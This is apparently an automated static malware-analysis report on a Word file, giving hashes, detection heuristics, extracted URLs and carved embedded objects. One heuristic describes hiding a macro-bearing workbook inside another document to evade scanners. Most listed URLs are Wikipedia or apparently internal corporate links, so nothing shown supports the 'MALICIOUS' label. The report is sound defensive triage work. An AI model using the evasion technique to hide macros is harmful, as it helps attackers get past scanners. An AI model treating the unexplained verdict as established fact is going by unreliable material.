Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9ba7be41a17ce463…

MALICIOUS

Office (OOXML)

10.52 MB Created: 2017-05-26 03:08:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-01-23
MD5: eb13e957191ebbec67571a0bbe515080 SHA-1: 7c7865ee6aaf97b4d09ee43b960530e8c85760df SHA-256: 9ba7be41a17ce463912d606761d3c987d86f0e98af54c3ec6f084ce0e626420c
94 Risk Score

Heuristics 6

  • Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • External hyperlinks (38) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 38 external hyperlinks — clickable URLs are stored as external relationships. First target: http://en.wikipedia.org/wiki/Formaldehyde
  • Payload URL recovered from embedded OLE object (11 URLs) info OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.em.azcollaboration.com/Operations/biologics/GlobalEng/ProjProcess/_layouts/DocIdRedir.aspx?ID=GENG-42-266 In document text (OOXML body / shared strings)
    • http://www.dbp.org.uk/cs/DBP00207.pdfIn document text (OOXML body / shared strings)
    • https://www.em.azcollaboration.com/Operations/biologics/GlobalEng/BuiltEnv/_layouts/DocIdRedir.aspx?ID=GENG-91-43In document text (OOXML body / shared strings)
    • http://www.breeam.org/In document text (OOXML body / shared strings)
    • https://www.em.azcollaboration.com/Operations/EssExt/eng/TPS/00_PM_ALL/2 Pancras Square Sustainability Checklist.xlsDocument hyperlink
    • https://www.em.azcollaboration.com/Operations/EssExt/eng/TPS/00_PM_ALL/2 Pancras Ergonomics Checklist.docxDocument hyperlink
    • http://schemas.open����In document text (OOXML body / shared strings)
    • http://schemas.micrPIn document text (OOXML body / shared strings)
    • http://schemas.micrWIn document text (OOXML body / shared strings)
    • http://portalapps.is.astrazeneca.net/azgard-components/ldms-documents/global_she/effective/GlobalIn document text (OOXML body / shared strings)
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1b34afba7cd5b0e1128ba51010108a0c/?vgnextoid=df95e973c8212210VgnVCM2000003401920aRCRDIn document text (OOXML body / shared strings)
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1b34afba7cd5b0e1128ba51010108a0c/?vgnextoid=ebc27f2330562210VgnVCM1000003301920aRCRDIn document text (OOXML body / shared strings)
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1a05ec339a64a0e1128ba51010108a0c/?vgnextoid=e61402d897951210VgnVCM2000003401920aRCRDIn document text (OOXML body / shared strings)
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1a05ec339a64a0e1128ba51010108a0c/?vgnextoid=e61402d897951210VgnVCM2000003401920aRCRDZIn document text (OOXML body / shared strings)
    • http://www.usgbc.org/DisplayPage.aspx?CategoryID=19In document text (OOXML body / shared strings)
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.1b34afba7cd5b0e1128ba51010108a0c/?vgnextoid=2d027f2330562210VgnVCM1000003301920aRCRDIn document text (OOXML body / shared strings)
    • http://en.wikipedia.org/wiki/FormaldehydeDocument hyperlink
    • http://en.wikipedia.org/wiki/ChlorobenzenesDocument hyperlink
    • http://en.wikipedia.org/wiki/LeadDocument hyperlink
    • http://en.wikipedia.org/wiki/Polyvinyl_chlorideDocument hyperlink
    • http://en.wikipedia.org/wiki/CreosoteDocument hyperlink
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=c457a102f7b5d210VgnVCM2000003401920aRCRDDocument hyperlink
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=ddbe87c77da5d210VgnVCM1000003301920aRCRDDocument hyperlink
    • http://en.wikipedia.org/wiki/Bisphenol_ADocument hyperlink
    • http://en.wikipedia.org/wiki/ChlorodifluoromethaneDocument hyperlink
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=66eb4c50a865d210VgnVCM2000003401920aRCRDDocument hyperlink
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=f86881b2b4b5d210VgnVCM1000003301920aRCRDDocument hyperlink
    • http://en.wikipedia.org/wiki/HypalonDocument hyperlink
    • http://en.wikipedia.org/wiki/Chromium_VIDocument hyperlink
    • http://en.wikipedia.org/wiki/Flame_retardantDocument hyperlink
    • http://en.wikipedia.org/wiki/Perfluorinated_compoundDocument hyperlink
    • http://en.wikipedia.org/wiki/Volatile_organic_compoundsDocument hyperlink
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=aedb91aa9cb5d210VgnVCM2000003401920aRCRDDocument hyperlink
    • http://en.wikipedia.org/wiki/AsbestosDocument hyperlink
    • http://en.wikipedia.org/wiki/NeopreneDocument hyperlink
    • http://en.wikipedia.org/wiki/Chlorinated_paraffinsDocument hyperlink
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=029af3a51832e210VgnVCM1000003301920aRCRDDocument hyperlink
    • http://en.wikipedia.org/wiki/PolyethyleneDocument hyperlink
    • http://en.wikipedia.org/wiki/Polychlorinated_biphenylsDocument hyperlink
    • http://en.wikipedia.org/wiki/PentachlorophenolDocument hyperlink
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=0259f3a51832e210VgnVCM1000003301920aRCRDDocument hyperlink
    • http://en.wikipedia.org/wiki/AlkylphenolsDocument hyperlink
    • http://en.wikipedia.org/wiki/CadmiumDocument hyperlink
    • http://en.wikipedia.org/wiki/ChloropreneDocument hyperlink
    • http://en.wikipedia.org/wiki/Mercury_(elementDocument hyperlink
    • http://en.wikipedia.org/wiki/Polyvinylidene_chlorideDocument hyperlink
    • http://youraz.astrazeneca.net/portal/site/AZ/menuitem.973a3a2a8d5bd1f5e8a77d1010108a0c/?vgnextoid=24ea6e8c4d55d210VgnVCM1000003301920aRCRDDocument hyperlink
    • http://en.wikipedia.org/wiki/ArsenicDocument hyperlink
    • http://en.wikipedia.org/wiki/ChlorofluorocarbonsDocument hyperlink
    • http://en.wikipedia.org/wiki/Chlorinated_polyvinyl_chlorideDocument hyperlink
    +32 more URL(s)

Extracted artifacts 10

Files carved from inside the sample during analysis.

FilenameKindSourceSize
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject3.bin 141312 bytes
SHA-256: d0e8981e6e0fd5d3c8eaba37c4dd1535182296386ff29bce6e379fbe217f1b24
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.87, consistent with packed or encrypted content.
ooxml_oleobject_01.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 8388608 bytes
SHA-256: bc74956cfa6dcbfdd707ca7f3520c0bfcaf9ec6261e3d55e7e0e9bb04c93cb12
ooxml_oleobject_02.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject2.bin 299520 bytes
SHA-256: 95c6656fac02e54f58136503ea376b046c23f030db5e137b565a6e8ba614517c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.95, consistent with packed or encrypted content.
ooxml_oleobject_03.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/Microsoft_Word_97_-_2003_Document1.doc 1281536 bytes
SHA-256: 8c9b867da120fb7eb24a207baddb0c2b072df30809e64f85868b58e2a4986c51
ooxml_oleobject_04.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/Microsoft_Excel_97-2003_Worksheet2.xls 497664 bytes
SHA-256: 37ae938d1035e1f1af4c043faf54a2b6e8cd0a8caa49c870b6189623d8612879
emf_00.emf ooxml-emf OOXML EMF part: word/media/image3.emf 5528 bytes
SHA-256: 0475388c52e1561c740f7620fc016657c7554107a90e1fcd1d5720571029fc1e
emf_01.emf ooxml-emf OOXML EMF part: word/media/image4.emf 5452 bytes
SHA-256: 34492bca044ed8f1efe90d5a1762f78a98852bf24773d281365c2e148dfc20b7
emf_02.emf ooxml-emf OOXML EMF part: word/media/image5.emf 1504468 bytes
SHA-256: 301fffc17f9c8a6c6305ca75e50573ffa84b25732c9f87f5af47a21d6a25990d
emf_03.emf ooxml-emf OOXML EMF part: word/media/image7.emf 5600 bytes
SHA-256: 7f3a25e3d95587c524a01d4f4c93a213d98669fcfa01f30bf39c0bda2e576b74
emf_04.emf ooxml-emf OOXML EMF part: word/media/image6.emf 5400 bytes
SHA-256: daddfd551be27e7890477b7cdf1cb01edc79433d6c050ae85886feed22f88afe